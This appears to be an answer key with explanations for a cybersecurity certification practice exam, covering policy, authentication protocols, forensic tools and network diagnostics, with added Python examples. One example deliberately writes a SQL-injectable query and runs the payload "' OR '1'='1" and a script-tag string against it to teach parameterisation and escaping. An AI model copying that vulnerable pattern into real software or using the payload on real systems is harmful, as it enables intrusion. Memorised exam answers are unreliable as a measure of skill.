B. Bro is an open source intrusion detection and prevention system. Sourcefire is a com- 
mercial company associated with the Snort IDS, but Sourcefire is not itself an open source 
product. TippingPoint and Proventia are IDS/IPS solutions from HP and IBM, respectively. 


B. Load testing, or stress testing, evaluates an application’s performance under full load 
conditions. It is the best type of testing to meet John’s requirements, as the other test types 
do not simulate a high-demand situation. 


B. Security artifacts created during the design phase include security architecture docu- 
mentation and data flow diagrams. 


C. Requests for an exception to a security policy would not normally include a proposed 
revision to the policy. Exceptions are documented variances from the policy because of 
specific technical and/or business requirements. They do not alter the original policy, 
which remains in force for systems not covered by the exception. 


D. While all the COBIT components are useful to an organization seeking to implement 
the COBIT framework, only the maturity models offer an assessment tool that helps the 
organization assess its progress. 


D. Account management policies describe the account life cycle from provisioning 
through active use and decommissioning, including removing access upon termination. 
Data ownership policies clearly state the ownership of information created or used by the 
organization. Data classification policies describe the classification structure used by 
the organization and the process used to properly assign classifications to data. Data 
retention policies outline what information the organization will maintain and the length 
of time different categories of information will be retained prior to destruction. 


A. The Health Insurance Portability and Accountability Act (HIPAA) covers the han- 
dling of protected health information (PHI) by healthcare providers, insurers, and health 
information clearinghouses. The Gramm-Leach-Bliley Act (GLBA) includes regulations 
covering the cybersecurity programs at financial institutions, including banks. The Fam- 
ily Educational Rights and Privacy Act (FERPA) applies to educational institutions. The 
Sarbanes-Oxley Act (SOX) applies to publicly traded companies. 


B. Separation of duties is a principle that prevents individuals from having two different 
privileges that, when combined, could be misused. Separating the ability to create vendors 
and authorize payments is an example of two-person control. 


D. Two-person control is a principle that requires the concurrence of two different 
employees to perform a single sensitive action. Requiring two signatures on a check is an 
example of a two-person control. 


B. Mandatory vacations and job rotation plans are able to detect malfeasance by requir- 
ing an employee’s absence from his or her normal duties and exposing them to other 
employees. Privilege use reviews have a manager review the actions of an employee with 
privileged system access and would detect misuse of those privileges. Background investi- 
gations uncover past acts and would not be helpful in detecting active fraud. They are also 
typically performed only for new hires. 


C. The tracert (or traceroute) command identifies the path of packet flow between 
two systems over a network. It would help Johann identify potential trouble points requir- 
ing further investigation. 


A. The netstat results show an active SSH connection on the server, as well as several 
active HTTP connections. The server is listening for HTTPS, MySQL, and NTP connec- 
tions, but there are no active sessions. 


A. Web proxy servers actually increase the speed of loading web pages by creating local 
caches of those pages, preventing repeated trips out to remote Internet servers. For this 
same reason, they reduce network traffic. Web proxies may also serve as content filters, 
blocking both malicious traffic and traffic that violates content policies. 


A. This is an example of dual control (or two-person control) where performing a sensi- 
tive action (logging onto the payment system) requires the cooperation of two individuals. 
Separation of duties is related but would involve not allowing the same person to perform 
two actions that, when combined, could be harmful. 


C. Analyzing these dig results, you see that the DNS server (identified in the SERVER line) 
is 172.30.25.8. 198.134.5.6 is the query response, indicating that it is the CompTIA.org 
web server. The AUTHORITY value in this result is 0, indicating that the DNS server is not 
authoritative for the CompTIA.org domain. 


D. Kerberos is the only answer that provides automatic protection for authentication 
traffic. TACACS is outdated, and TACACS+ is considered unsafe in most circumstances, 
meaning that it should be used on secure networks only if it must be used. RADIUS can 
be secured but is not secure by default. 


D. The AccessEnum tool enumerates system access. It provides a view of who has permis- 
sions to files, directories, and other objects. AutoRuns shows what programs start at login 
or system boot. SDelete is a secure file deletion utility. Sysmon allows administrators to 
monitor processes and their activity in a searchable manner. 


D. While OAuth may be paired with almost any authentication provider, the most com- 
mon approach is to pair OAuth and OpenID Connect to provide a complete authentica- 
tion and authorization solution. 


A. Business architecture defines governance and organization and explains the interaction 
between enterprise architecture and business strategy. Applications architecture includes 
the applications and systems that an organization deploys, the interactions between those 
systems, and their relation to business processes. Data architecture provides the orga- 
nization’s approach to storing and managing information assets. Technical architecture 
describes the infrastructure needed to support the other architectural domains. 


B. The test environment contains a complete version of the code, as the developers intend 
to release it. This is the best place to conduct rigorous testing, such as security analysis. 
The development environment is constantly in a state of flux and not a good environment 
for formalized testing. Code should be released to production only when it is ready for 
use by clients, and security testing should take place before code is placed in a production 
environment. Staging environments are holding areas used as part of the code release 
process. 


A. The Open Web Application Security Project (OWASP) maintains a listing of com- 
mon application vulnerabilities. The SANS Institute maintained a similar list but stopped 
updating it in 2011. Microsoft and Google do not publish a similar list. 


D. OSSIM is an open source SIEM made by AlienVault. It is capable of pulling together 
information from a wide variety of open source security tools. QRadar, ArcSight, and 
AlienVault are all examples of commercial SIEM solutions. 


A. Static analysis of code involves manual or automated techniques that review the source 
code without executing it. Fuzzing and fault injection are examples of dynamic analysis 
that execute the code and attempt to induce flaws. 


C. Of the choices listed, only the combination of an ID badge and PIN is a multifac- 
tor solution. ID badges are “something you have,” and a PIN is “something you know.” 
Passwords, PINs, and security question answers are all “something you know” factors, so 
combining them does not create multifactor authentication. Fingerprints and retinal scans 
are both examples of “something you are.” 


C. In the SABSA model, the Builder’s view corresponds to the physical security archi- 
tecture. The Designer’s view corresponds to the logical security architecture layer. The 
Architect’s view corresponds to the conceptual security architecture layer. The Trades- 
man’s view corresponds to the component security architecture layer. 


B. The AccessEnum tool provides a view into which users and groups have permissions to 
read and modify files, directories, and registry entries. Sysmon and ProcDump are process 
monitoring tools that do not provide insight into the registry. AutoRuns provides a listing of 
the programs that start automatically when a system boots or a user logs into the system. 


D. In this situation, the best case for Amy would be to delegate management of the indi- 
vidual user accounts to the vendor. Amy should avoid a situation where she must create 
the individual accounts to reduce the burden on her. Using a single account violates many 
principles of security and eliminates accountability for individual user actions. If Amy 
implements the delegated account approach, she may want to supplement it with auditing 
to verify that accounts are properly managed. 


C. The TOGAF Architecture Development Model is centered on requirements. The 
requirements inform each of the other phases of the model. 


B. LDAP injection attacks use improperly filtered user input via web applications to send 
arbitrary LDAP queries to directory servers. SASL is a password storage scheme for direc- 
tory services, but there is no attack type known as SASL skimming. Man-in-the-middle 
attacks may be used against directory servers, but they are not specific to directory envi- 
ronments. Cross-site scripting (XSS) attacks are waged against web servers. 


C. The Microsoft Baseline Security Analyzer (MBSA) works only with Microsoft operat- 
ing systems. The other products listed are all capable of scanning systems running any 
operating system. 


A. This activity is almost certainly a violation of the organization’s acceptable use policy, 
which should contain provisions describing appropriate use of networks and computing 
resources belonging to the organization. 


A. The type of tool that Brenda seeks is known as a fuzzer. The Peach Fuzzer is a solution 
that meets these requirements. Burp and ZAP are interception proxies. ModSecurity is a 
web application firewall tool. 


D. ZAP, Vega, and Burp are all interception proxies useful for the penetration testing of 
web applications. Snort is an intrusion detection system and does not have this capability. 


A. The NIST Cybersecurity Framework uses four implementation tiers to describe an 
organization’s progress toward achieving cybersecurity objectives. The first stage, tier 1, is 
Partial. This is followed by the Risk Informed, Repeatable, and Adaptive tiers. 


C. While all of these tools may have the ability to perform forensic analysis on mobile 
devices, Cellebrite is a purpose-built tool designed specifically for mobile forensics. 


A. The rapid application development (RAD) approach uses an iterative approach to 
software development that generates a series of evolving prototypes in each phase. 


C. Organizations may require all of these items as part of an approved exception request. 
However, the documentation of scope, duration of the exception, and business justifica- 
tion are designed to clearly describe and substantiate the exception request. The compen- 
sating control, on the other hand, is designed to ensure that the organization meets the 
intent and rigor of the original requirement. 


A. All of the tools listed would allow Crystal to modify session values. However, of these 
tools, only Tamper Data is a browser plug-in. It works within the Firefox browser and 
allows the user to modify session data before it is submitted to a web server. 


C. This is an example of separation of duties. Someone who has the ability to transfer 
funds into the account and issue payments could initiate a very large fund transfer, so 
Berta has separated these responsibilities into different roles. Separation of duties goes 
beyond least privilege by intentionally changing jobs to minimize the access that an indi- 
vidual has, rather than granting them the full permissions necessary to perform their job. 
This is not an example of dual control because each action may still be performed by a 
single individual. 


106. A. User training is the most effective control against phishing attacks, as it encourages 
users to recognize and avoid phishing messages. An intrusion detection system may notice 
an attack taking place but cannot take action to prevent it. Application blacklisting would 
only work against ransomware if it were already known and included on the blacklist, 
which is not likely. Social engineering is an attack type, rather than a control. 


107. A. The ifconfig command displays information about network interfaces on a Linux 
system. The ipconfig command displays similar information on Windows systems. 
tcpdump is a packet capture tool and iptables is a Linux firewall. 


108. C. FTK, EnCase, and Helix are all commercial forensic toolkits. The SANS Investigative 
Forensics Toolkit (SIFT) is an Ubuntu-based set of open source forensics tools. 


109. D. The nodes in the diagram exist between domain component (dc) and common name 
(cn) nodes. This is the proper location for an organizational unit (ou) node. Active Direc- 
tory (ad) is a type of LDAP server. 


110. C. The sender of a message should encrypt that message using the public key of the mes- 
sage recipient. In this case, Alice should encrypt the message using Bob’s public key. 


111. D. The recipient of a message should decrypt the message using his or her own private 
key. In this case, Bob should decrypt the message using his own private key. 


112. B. The party creating a digital signature uses his or her own private key to encrypt the 
message digest. In this case, Alice should create the signature using her own private key. 


113. A. Anyone who receives a digitally signed message may verify the digital signature by 
decrypting it with the signer’s public key. 
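
Answers 110 through 113 describe which key each party uses. As an added example (not from the book), the toy implementation below makes those roles explicit: Alice encrypts with Bob's public key, Bob decrypts with his private key, Alice signs a digest with her private key, and anyone verifies with her public key. It uses textbook RSA with tiny hard-coded primes and no padding, which is an assumption made purely for illustration.

```python
"""Constructed example: key roles for confidentiality versus digital signatures.
Textbook RSA with small constructed primes and no padding, for illustration only."""
import hashlib
from typing import Tuple

PublicKey = Tuple[int, int]    # (e, n)
PrivateKey = Tuple[int, int]   # (d, n)


def make_keypair(p: int, q: int, e: int = 17) -> Tuple[PublicKey, PrivateKey]:
    """Derive a (public, private) pair from two primes; e must be coprime to phi."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)          # modular inverse of e (Python 3.8+)
    return (e, n), (d, n)


def encrypt(message: int, recipient_public: PublicKey) -> int:
    """Confidentiality: the sender uses the RECIPIENT's public key (answer 110)."""
    e, n = recipient_public
    if not 0 <= message < n:
        raise ValueError("toy RSA: message must be an integer smaller than n")
    return pow(message, e, n)


def decrypt(ciphertext: int, recipient_private: PrivateKey) -> int:
    """The recipient decrypts with his or her OWN private key (answer 111)."""
    d, n = recipient_private
    return pow(ciphertext, d, n)


def digest(data: bytes, n: int) -> int:
    """Message digest reduced mod n so the toy modulus can carry it."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(data: bytes, signer_private: PrivateKey) -> int:
    """The signer encrypts the digest with his or her OWN private key (answer 112)."""
    d, n = signer_private
    return pow(digest(data, n), d, n)


def verify(data: bytes, signature: int, signer_public: PublicKey) -> bool:
    """Anyone verifies by decrypting the signature with the SIGNER's public key
    and comparing it to a fresh digest of the data (answer 113)."""
    e, n = signer_public
    return pow(signature, e, n) == digest(data, n)


# Constructed keys for Alice and Bob (tiny primes; demonstration only).
ALICE_PUB, ALICE_PRIV = make_keypair(61, 53)     # n = 3233
BOB_PUB, BOB_PRIV = make_keypair(101, 113)       # n = 11413

if __name__ == "__main__":
    secret = 42
    ct = encrypt(secret, BOB_PUB)                # Alice -> Bob: Bob's public key
    print("Bob recovers:", decrypt(ct, BOB_PRIV))  # 42, Bob's private key
    msg = b"Alice approves payment 1234"
    sig = sign(msg, ALICE_PRIV)                  # Alice's private key
    print("signature valid:", verify(msg, sig, ALICE_PUB))   # True
```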


114. D. Nonrepudiation is a cryptographic goal that prevents the signer of a message from 
later claiming that the signature is not authentic. Digital signatures provide nonrepudia- 
tion. They do not provide confidentiality. Accountability and availability are not crypto- 
graphic goals. 


115. B. While configuration management or automated patching would address this issue, 
these are not feasible approaches because Sam does not have the ability to log into the 
device. Intrusion prevention would add a layer of security, but it does not directly address 
the issue of operating system patching. Vulnerability scanning would allow Sam to detect 
missing patches and follow up with the vendor. 


116. B. From this information, the only valid conclusion that Val can reach is that there is a 
properly functioning network path between her system and the remote web server. She 
can’t draw any conclusions about the functioning of the web server from this information. 
The latency is around 17 milliseconds, which is not excessive, and the ping results do not 
show any packet loss. 


117. B. The entity that operates the service requested by the end user is known as the service 
provider (SP). 


118. A. Data ownership policies clearly state the ownership of information created or used 
by the organization. Data classification policies describe the classification structure used 
by the organization and the process used to properly assign classifications to data. Data 
retention policies outline what information the organization will maintain and the length 
of time different categories of information will be retained prior to destruction. Account 
management policies describe the account life cycle from provisioning through active use 
and decommissioning. 


B. Address space layout randomization (ASLR) rearranges memory locations in a ran- 
domized fashion to prevent attacks that rely upon knowledge of specific memory location 
use. Data execution prevention (DEP) prevents the execution of malware loaded into the 
data space of memory. DLP and EMEA are not EMET features. 


B. The use of a smartphone authenticator app demonstrates possession of the device and 
is an example of “something you have.” When combined with a password (“something 
you know”), this approach provides multifactor authentication. 


C. The agile method divides work into short working sessions, called sprints, that can 
last from a few days to a few weeks. 


B. The diagram already shows a firewall in place on both sides of the network connec- 
tion. Ian should place a VPN at the point marked by ?s to ensure that communications 
over the Internet are encrypted. IPS and DLP systems do provide added security controls, 
but they do not provide encrypted network connections. 


D. FTK, EnCase, and Helix are all examples of forensic suites. Burp is an interception 
proxy used in penetration testing and web application testing. 


C. The fact that the user connected with an account belonging to an administrative 
assistant and was then able to execute administrative commands indicates that a privilege 
escalation attack took place. While buffer overflows are a common method of engaging 
in privilege escalation attacks, there is no evidence in the scenario that this technique was 
used. 


B. Vulnerability scanning would not serve as a compensating control because it would 
only detect, rather than correct, security flaws. There is no indication that encryption is 
not in place on this server or that it would address a SQL injection vulnerability. Both an 
intrusion prevention system (IPS) and a web application firewall (WAF) have the ability to 
serve as a compensating control and block malicious requests. Of the two, a web applica- 
tion firewall would be the best solution in this case because it is purpose-built for protect- 
ing against the exploitation of web application vulnerabilities. 


C. User acceptance testing (UAT) verifies that code meets user requirements and is typi- 
cally the last phase of application testing before code is released to production. 


B. Logical controls are technical controls that enforce confidentiality, integrity, and avail- 
ability in the digital space. This control meets that definition. Physical controls are security 
controls that impact the physical world. Administrative controls are procedural mecha- 
nisms that an organization follows to implement sound security management practices. 
There is no indication given that this control is designed to compensate for a control gap. 
B. The tool shown is ZAP, a popular application proxy tool. ZAP is an interception proxy 
that allows many types of application testing, such as the fuzz testing (or fuzzing) shown 
in the image. ZAP does not perform static analysis or vulnerability scanning, and there is 
no indication that Sam’s test was performed as a component of peer review. 


A. Host firewalls operate at the individual system level and, therefore, cannot be used to 
implement network segmentation. Routers and switches may be used for this purpose by 
either physically separating networks or implementing VLAN tagging. Network firewalls 
may also be used to segment networks into different zones. 


B. The destination of the traceroute appears in the first line of the results: 
traceroute to d3ag4hukkh62yn.cloudfront.net (52.84.61.25), 
64 hops max, 52 byte packets. 


A. The address of the default gateway on Maddox’s system will appear as the first hop in 
the traceroute results. In this case, it is 192.168.1.1. 


D. The first three IP addresses in the traceroute results are all private (RFC 1918) 
addresses, indicating that those hops are on Maddox's local network. The first public 
address that appears in the list is 68.66.73.118. 


A. Asterisks appear in traceroute results when an intermediate hop does not return an 
ICMP Time Exceeded reply within the timeout, typically because the router rate-limits or 
filters those replies. This is common in traceroute results and does not by itself indicate 
a problem, so Maddox should not read any significance into it. 
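The four traceroute answers above all come down to reading the same output carefully. The following is an added example (my code, not the book's) that extracts those facts programmatically: the destination from the header line, the default gateway as the first responding hop, the first non-private hop as the point where the path leaves the local network, and the hops that answered only with asterisks. The sample output is constructed for the example; the destination and the 68.66.73.118 hop reuse the values from the answers above, while the private hops and the silent hop 5 are illustrative.

```python
"""Parse traceroute output for destination, default gateway, first public hop
and unresponsive hops.  Added example; the SAMPLE text is constructed."""
import ipaddress
import re

SAMPLE = """\
traceroute to d3ag4hukkh62yn.cloudfront.net (52.84.61.25), 64 hops max, 52 byte packets
 1  192.168.1.1 (192.168.1.1)  1.205 ms  0.912 ms  0.988 ms
 2  10.10.0.1 (10.10.0.1)  5.531 ms  5.112 ms  5.302 ms
 3  10.10.255.254 (10.10.255.254)  9.934 ms  9.701 ms  10.118 ms
 4  68.66.73.118 (68.66.73.118)  15.227 ms  14.801 ms  15.004 ms
 5  * * *
 6  52.84.61.25 (52.84.61.25)  22.410 ms  22.133 ms  22.617 ms
"""

HEADER_RE = re.compile(r"^traceroute to (\S+) \((\d{1,3}(?:\.\d{1,3}){3})\)")
HOP_RE = re.compile(r"^\s*(\d+)\s+(.*)$")
IP_RE = re.compile(r"\((\d{1,3}(?:\.\d{1,3}){3})\)")


def parse_traceroute(text):
    """Return (destination_host, destination_ip, hops); hops is a list of
    (hop_number, ip_or_None), None meaning the hop answered only with asterisks."""
    lines = [line for line in text.splitlines() if line.strip()]
    m = HEADER_RE.match(lines[0])
    if not m:
        raise ValueError("missing traceroute header line")
    hops = []
    for line in lines[1:]:
        hm = HOP_RE.match(line)
        if not hm:
            continue
        ipm = IP_RE.search(hm.group(2))
        hops.append((int(hm.group(1)), ipm.group(1) if ipm else None))
    return m.group(1), m.group(2), hops


def default_gateway(hops):
    """The first hop that replied is the probing host's default gateway."""
    return next((ip for _, ip in hops if ip is not None), None)


def first_public_hop(hops):
    """First hop whose address is not private: where the path leaves the local
    network.  ipaddress.is_private covers RFC 1918 plus loopback, link-local and
    the documentation ranges, which is the behaviour we want here."""
    return next((ip for _, ip in hops
                 if ip is not None and not ipaddress.ip_address(ip).is_private), None)


def silent_hops(hops):
    """Hop numbers that returned only asterisks: no ICMP Time Exceeded reply
    came back, usually because the router rate-limits or filters them."""
    return [n for n, ip in hops if ip is None]


if __name__ == "__main__":
    host, dest, hops = parse_traceroute(SAMPLE)
    print(host, dest, default_gateway(hops), first_public_hop(hops), silent_hops(hops))
```

Note that `is_private` treats the 192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24 documentation ranges as non-global too, so do not use those as stand-ins for "public" hops when you test this against your own output.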


D. Data retention policies describe what information the organization will maintain and 
the length of time different categories of information will be retained prior to destruction, 
including both minimum and maximum retention periods. Data classification would be 
covered by the data classification policy. 


C. All of the services shown on the TCPView results are standard Windows services that 
would appear on any Windows server, with one exception. sqlservr.exe is a process 
associated with Microsoft SQL Server and would be found only on a database server. 


D. All of the tools listed have forensic imaging capabilities, but dd is a general-purpose 
block-copying utility that ships with virtually every Linux system, so it is always at hand. 
It does not hash the image or block writes on its own, so pair it with a hash tool such as 
sha256sum and a write blocker when evidence integrity matters. 


C. Bobbi is adopting a physical, not logical, isolation strategy. In this approach, known 
as air gapping, the organization uses a stand-alone system for the sensitive function that 
is not connected to any other system or network, greatly reducing the risk of compromise. 
VLAN isolation and network segmentation involve a degree of interconnection that is not 
present in this scenario. 


D. The waterfall model follows a series of sequential steps, as shown here. The agile 
software development methodology is characterized by multiple sprints, each producing a 
concrete result. The spiral model uses multiple passes through four phases, resulting in a 
spiral-like diagram. Rapid application development uses a five-phase approach in an 
iterative format. 
C. The greatest weakness inherent in RADIUS is that it protects the user password only 
with an obfuscation scheme built on the broken MD5 hash function (the password is XORed 
with MD5 of the shared secret and the request authenticator), and other attributes travel 
in the clear. Hashing or encryption of stored passwords does not address this risk, but 
tunneling RADIUS communications over an encrypted network connection (IPsec, or RadSec, 
which is RADIUS over TLS) does mitigate the issue. 


C. In a SAML transaction, the user initiates a request to the relying party, which then 
redirects the user to the SSO provider. The user then authenticates to the SAML identity 
provider and receives a SAML response, which is sent to the relying party as proof of identity. 


A. After a user authenticates to an identity provider, the identity provider creates a secu- 
rity token and provides it to the end user, who may then use it to authenticate to a service 
provider. 


A. The error indicates that the certificate authority that signed the certificate is not 
trusted by the client. This is the usual result when an organization self-signs a digital 
certificate. Ty can resolve the error by obtaining a certificate from a CA the clients 
already trust or, for purely internal systems, by distributing the organization's own CA 
certificate to the clients' trust stores. 


D. FTK is a suite of forensic tools, not a web application firewall. CloudFlare, FortiWeb, 
and NAXSI are all web application firewall products. 


A. The continual service improvement (CSI) activity in ITIL is designed to increase the 
quality and effectiveness of IT services. It is the umbrella activity that surrounds all other 
ITIL activities. 


C. CheckPoint, Palo Alto, and Juniper are all suppliers of network firewalls. FireEye pro- 
vides endpoint protection and other advanced threat mitigation tools but does not provide 
network firewalls. 


C. The Fagan inspection is a highly formalized, rigorous code review process that 
involves six phases. Pair programming, over-the-shoulder reviews, and pass-around code 
reviews are all examples of lightweight, fairly informal code review processes. 


A. Pair programming is an agile software development technique that places two developers 
at one workstation. One developer writes code, while the other developer reviews their 
code as they write it. Over-the-shoulder code review also relies on a pair of developers, 
but rather than requiring constant interaction and hand-offs, it requires the developer 
who wrote the code to explain the code to the other developer. Pass-around code review, 
sometimes known as email pass-around code review, is a form of manual peer review done by 
sending completed code to reviewers who check the code for issues. Tool-assisted code 
reviews rely on formal or informal software-based tools to conduct code reviews. 


D. Framework Profiles describe how a specific organization might approach the security 
functions covered by the Framework Core. The Framework Core is a set of five security 
functions that apply across all industries and sectors: identify, protect, detect, respond, 
and recover. The Framework Implementation Tiers assess how an organization is posi- 
tioned to meet cybersecurity objectives. 
D. The en1 interface is the only interface that has an active, valid IP address (10.0.1.77) 
that may be used for network communication. The lo0 interface also has an IP address 
(127.0.0.1), but this is the loopback address, used to communicate with the local host, not 
on a network. 


C. The interface shown in the picture is Splunk, a SIEM that specializes in visual search 
and allows analysts to comb through massive quantities of information in an intuitive 
way. Kiwi and other Syslog tools allow the collection and analysis of this information 
but do not provide the visual interface used in Splunk. Sysinternals does not include a log 
analysis tool. 


A. Acunetix is a web application vulnerability scanner. Of the flaws listed, only cross-site 
scripting is a web application vulnerability that the scanner would likely detect. 


A. This packet uses the DNS protocol, as shown in the protocol column of the packet. This 
indicates that it is part of a name resolution request. The payload of the packet shows a 
query but not a response, so this packet is a request for name resolution. 


D. ISO 27001 is a voluntary standard, and there is no law or regulation requiring that 
healthcare organizations, financial services firms, or educational institutions adopt it. 


C. In the OAuth framework, the servers that provide services to end users are known as 
resource servers. The web service run by Ursula’s organization would use resource servers 
to provide the service to end users. 


B. Security information and event management (SIEM) systems aggregate security logs, 
configuration data, vulnerability records, and other security information and then allow 
analysts to correlate those entries for important results. Data loss prevention (DLP) tools 
and intrusion prevention systems (IPS) are sources of security information but do not per- 
form aggregation and correlation. Customer relationship management (CRM) systems are 
a business application used to assist in the sales process. 


A. Physical security controls are those controls that impact the physical world. Door 
locks, biometric door controllers, and fire suppression systems all meet this criterion. 
Network firewalls prevent network-based attacks and are an example of a logical/technical 
control. 


C. The 2016 public preview draft of NIST Special Publication 800-63-3 (then titled "Digital 
Authentication Guideline" and published in 2017 as "Digital Identity Guidelines") proposed 
deprecating SMS as an out-of-band authenticator because of the number of ways in which 
attackers can gain access to SMS messages, including redirection of VoIP-backed numbers, 
SIM swapping, and interception of unencrypted SMS messages in the carrier network. The 
final version classifies SMS and other PSTN-based authenticators as "restricted" rather 
than banning them outright. 


B. As stated in the question, Orizon performs a review of Java classes, indicating that it is 
performing a source code review. Techniques that perform source code review are grouped 
into the category of static code analyzers. The other testing techniques listed in this ques- 
tion are all examples of dynamic code analysis, where the testing application actually 
executes the code. 
B. It is sometimes difficult to distinguish between cases of least privilege, separation of 
duties, and dual control. Least privilege means that an employee should only have the 
access rights necessary to perform their job. While this may be true in this scenario, you 
do not have enough information to make that determination because you do not know 
whether access to the database would help the security team perform their duties. Separa- 
tion of duties occurs when the same employee does not have permission to perform two 
different actions that, when combined, could undermine security. That is the case here 
because a team member who had the ability to both approve access and access the data- 
base may be able to grant themselves access to the database. Dual control occurs when 
two employees must jointly authorize the same action. Security through obscurity occurs 
when the security of a control depends upon the secrecy of its mechanism. 


D. The $ character does not by itself signal a security issue. The angle brackets (<>) 
delimit HTML tags and require further inspection to determine whether they are part of a 
cross-site scripting attack. The single quotation mark (') closes a string literal in SQL, 
so it could be used as part of a SQL injection attack. 
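To make the point about the single quote concrete, here is an added example (my code, not the book's) that runs the same user lookup two ways against an in-memory SQLite table with constructed rows: once with the value spliced into the SQL text, once with a bound parameter. It also shows the output-encoding counterpart for the angle brackets.

```python
"""Why ' and <> matter: concatenated versus parameterised SQL, and HTML escaping.
Added example; the users table and its rows are constructed."""
import html
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return conn


def lookup_unsafe(conn, username):
    # Vulnerable on purpose: the value is spliced into the SQL text, so a quote in
    # the input closes the literal the application opened and the rest becomes SQL.
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    # The driver sends the value separately from the statement; a quote inside
    # it is just a character, so the injected text matches no username.
    return conn.execute("SELECT username, role FROM users WHERE username = ?",
                        (username,)).fetchall()


def render_greeting(username):
    """The same idea for <>: escape on output so a tag in the input stays text."""
    return "<p>Welcome, " + html.escape(username) + "</p>"


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print(lookup_unsafe(db, payload))   # every row comes back
    print(lookup_safe(db, payload))     # nothing comes back
    print(render_greeting("<script>alert(1)</script>"))
```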


C. The Center for Internet Security (CIS) publishes a widely respected set of configura- 
tion standards and benchmarks for operating systems and popular applications. The CIS 
benchmarks would be an excellent starting point for securing Dave’s web server. 


C. Succession planning and cross-training both serve to facilitate continuity of operations 
by creating a pool of candidates for job vacancies. Of these, only cross-training encom- 
passes actively involving other people in operational processes, which may also help detect 
fraud. Dual control and separation of duties are both controls that deter fraud, but they 
do not facilitate the continuity of operations. 


C. The fact that the SHA hash value from Friday is identical to the value from Wednesday 
indicates that the file is identical. 


Maureen is designing an authentication system upgrade for her organization. The organi- 
zation currently uses only password-based authentication and has been suffering a series 
of phishing attacks. Maureen is tasked with upgrading the company’s technology to better 
protect against this threat. 


C. Passwords, which are already used by the organization are a “something you know” 
factor. Adding a PIN or security question simply adds another “something you know” 
factor, failing to achieve Maureen’s goal of multifactor authentication. Increasing the com- 
plexity of passwords makes them stronger but does not add an additional factor. Using 
smartcards adds a “something you have” factor, achieving multifactor authentication. 


C. SMS is no longer considered a strong second factor. The 2016 draft of NIST's Special 
Publication 800-63-3 (then titled "Digital Authentication Guideline") proposed deprecating 
SMS, and the final SP 800-63B classifies SMS and other PSTN-based out-of-band 
authenticators as restricted. Successful attacks against SMS-based one-time passwords 
(SIM swapping, SS7 interception, redirection of VoIP numbers) are both increasing and 
relatively easy to carry out. HOTP tokens, TOTP tokens, and soft tokens are all acceptable 
alternatives. 
B. Context-based authentication allows authentication decisions to be made based on 
information about the user, the system the user is connecting from, or other information 
that is relevant to the system or organization performing the authentication. Maureen 
already added multifactor authentication to the network. Dual authentication is used 
to implement the dual control concept, which is not a stated objective here. There is no 
indication that Maureen intends to implement biometric authentication. 


D. The operational view describes how a function is performed or what it accomplishes. 
This view typically shows how information flows in a system. The technical view focuses 
on the technologies, settings, and configurations used in an architecture. The logical view 
describes how systems interconnect. The firewall view is not a standard architectural 
view. 


B. Compensating controls must be above and beyond other requirements. Jane is already 
required to lock users out after six incorrect login attempts, deploy multifactor authenti- 
cation, and require the use of alphanumeric passwords by other provisions of PCI DSS. 
Limiting logins to the local console would restrict network access to the system and seems 
to be a reasonable compensating control. 


B. If the standard is not being used, Gina should retire it so that it is not cluttering the 
policy repository and running the risk of becoming outdated. By archiving the standard, 
she can revisit it if needed in the future without investing the work of updating or review- 
ing the standard in the meantime. 


C. User acceptance testing (UAT) is typically the last type of testing performed, and it is 
generally the only software testing that involves end users. 


D. OAuth is a federated identity service that focuses on providing authorization services 
and is designed for use on the web. OpenID is also a federated solution for the web, but 
it provides only authentication and not authorization. Kerberos and Active Directory are 
more suitable for enterprise use. 


C. OAuth is commonly used to authorize access to APIs (a client presents an access token 
issued on the user's behalf) and interoperates with the many service providers that 
support it. RADIUS and TACACS+ are more commonly used to provide AAA services for network 
devices, while SAML is an XML-based standard that is often used to provide single sign-on 
to websites. 


A. Regression testing focuses on evaluating whether a change made to an environment 
introduces other unintended consequences. Therefore, it would be the best way for Haley 
to evaluate the overall impact of applying the security patch to the application. 


B. The kaizen continuous improvement approach is often used in manufacturing and 
in lean programming. It places the responsibility for improvement in the hands of all 
employees rather than assigning it to an individual. 


D. The Kerberos protocol is designed for use over insecure networks and uses strong 
encryption to protect authentication traffic. RADIUS, TACACS, and TACACS+ all con- 
tain vulnerabilities that require the use of additional encryption to protect their traffic. 
D. The diagram shows that there are two nonredundant components in this network: the 
distribution router and the edge switches. A failure of either of those devices would cause 
a network outage, as there is no redundant system ready to assume the workload. 


C. Secure Sockets Layer (SSL), Transport Layer Security (TLS), and virtual private net- 
works (VPNs) are all used to protect data in motion. AES cryptography may be used to 
protect data at rest. SSL is no longer considered secure, so it is not a good choice for Greg. 
The only answer choice that matches each tool with the appropriate type of information 
and does not use SSL is using TLS for data in motion and AES for data at rest. 


D. aircrack-ng is a suite of wireless security tools that would be perfectly suited for 
Francine’s WiFi security assessment. 


B. When using OpenLDAP, the SSHA password storage scheme stores a salted SHA-1 hash of 
the password. This is stronger than the CRYPT, MD5, and unsalted SHA schemes that 
OpenLDAP supports (SASL is a pass-through to an external SASL mechanism rather than a 
storage hash). The salt defeats precomputed tables, but SHA-1 is still fast to brute 
force, so where the contrib password modules are available, {PBKDF2} or {ARGON2} are 
better choices. 
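The {SSHA} format itself is simple: base64 of the SHA-1 digest of password-plus-salt, with the salt appended so a verifier can recover it. The following is an added example (my code, not OpenLDAP's) that produces and verifies values in that format and, for contrast, the unsalted {SHA} form in which two users with the same password end up with identical stored values.

```python
"""{SSHA} as stored by OpenLDAP: base64(SHA1(password || salt) || salt).
Added example, not OpenLDAP code.  Shows why the salt matters and how
verification recovers the salt from the stored value."""
import base64
import hashlib
import hmac
import os

PREFIX = "{SSHA}"
DIGEST_LEN = 20  # SHA-1 output; everything after it in the decoded value is salt


def ssha_hash(password: str, salt: bytes = None) -> str:
    """Produce an OpenLDAP-style {SSHA} userPassword value.  A fresh random salt
    is drawn when none is supplied, which is the normal case."""
    if salt is None:
        salt = os.urandom(8)
    digest = hashlib.sha1(password.encode("utf-8") + salt).digest()
    return PREFIX + base64.b64encode(digest + salt).decode("ascii")


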